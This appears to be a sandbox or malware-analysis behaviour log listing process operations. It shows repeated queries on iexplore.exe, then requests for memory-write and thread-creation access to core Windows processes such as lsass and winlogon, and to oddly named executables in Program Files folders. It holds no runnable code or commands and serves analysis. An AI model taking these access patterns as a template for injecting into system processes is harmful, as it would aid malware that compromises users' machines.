| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Get Info | c:\program files\internet explorer\iexplore.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_DUP_HANDLE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
22 | |
| Open | c:\program files\windows media player\shirts_cumshots_compaq.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\league.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\js_sound.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\beast-dry.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft synchronization services\forecastsgeographic.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\reno.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\specreformwear.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\rr_publications.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\solo.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\beam.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\adobe\configurations.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\fact-film-anticipated.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows defender\wanting villages.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
